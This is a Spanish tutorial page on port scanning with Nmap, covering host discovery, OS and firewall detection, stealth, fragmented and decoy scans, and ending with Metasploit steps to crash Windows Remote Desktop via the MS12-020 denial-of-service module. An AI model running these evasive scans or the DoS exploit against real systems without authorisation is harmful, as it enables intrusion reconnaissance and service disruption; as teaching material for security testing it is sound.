PDF de programación - Escaneo de Puertos con Nmap

Imágen de pdf Escaneo de Puertos con Nmap

Escaneo de Puertos con Nmapgráfica de visualizaciones

Publicado el 29 de Noviembre del 2018
1.217 visualizaciones desde el 29 de Noviembre del 2018
617,6 KB
7 paginas
Creado hace 10a (29/10/2013)
Escaneo de Puertos con Nmap

Que es Nmap

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos
escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor
Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para
descubrir servicios o servidores en una red informática.

Donde descargarlo

Para Windows : http://nmap.org/
Para Ubuntu : Con permisos de administrador: sudo apt-get install nmap

Bien visto la Introduccion al lio.

Para ver la direccion IP del router

En Ubuntu bastara con : route -n
Debajo de pasarela tendreis una IP estilo : 192.168.1.1, 192.168.1.0

Bajo Windows : ipconfig/all
Puerta de enlace predeterminada: 192.168.1.1, 192.168.1.0

Para ver hosts activos en una red:

nmap -sP 192.168.1.1/24
Lo que nos mostraria los distintos dispositivos que hay conectados

Escanear un unico host:

nmap 192.168.1.129

Escanear un nombre de host:
nmap scanme.nmap.org
En esta web de nmap podemos probar el escaner

Ver mas informacion:
nmap -v 192.168.1.129

Escanear varios hosts:
nmap -v 127.0.0.1 192.168.1.129

Excluir un host:
nmap 127.0.0.1 –exclude 192.168.1.129

Deteccion de Sistema Operativo:
nmap -O 192.168.1.129

Para ver si un host tiene activado el Firewall:
nmap -sA 192.168.1.129

Como se puede ver filtered o filtrados es que tiene el Firewall activo

Escanear un host con el Firewall activado:

nmap -f 192.168.1.129 : Divide la cabecera TCP en varios paquetes

Con la diferencia de que antes el puerto 3389 Remote Desktop me mostraba
Unfiltered sin filtar.
Y ahora me dice open

Otra opcion es :
nmap -PO 192.168.1.129 que lo que hace es ignorar el ping antes del escaneo

Escaneo de puertos individuales:

Con la opcion: p
nmap -p 21,22,23,25,80,110,135,139,443,445 192.168.1.129

Escanear un rango de puertos:
nmap -p 1-1024 192.168.1.129

Escaneo rapido:
nmap -F 192.168.1.129

Escaneo de servicios y puertos:
nmap -sV 192.168.1.129

Escaneo sigiloso:
nmap -sS 192.168.1.129

Ver solo los puertos abiertos:
nmap -open 192.168.1.129

Escaneo de señuelo:
nmap -D 192.168.1.123,192.168.1.130 192.168.1.129
La primera direccion IP en llegar seria 192.168.1.123
La segunda direccion IP en llegar seria 192.168.1.130
Al final nuestro objetivo que es: 192.168.1.129

Y para terminar veamos como esplotar el servicio remoto del puerto 3389
Probado en Windows xp sp3 y Windows 7 Ultimate

Abrimos Metasploit
Y buscamos: search dos
Y elegimos este exploit
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Despues show options

set RHOST el host remoto

En este caso 192.168.1.129

Y exploit

Quedando asi Metasploit

Y asi Windows

Espero que os guste un saludo 4tf3
  • Links de descarga
http://lwp-l.com/pdf14368

Comentarios de: Escaneo de Puertos con Nmap (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad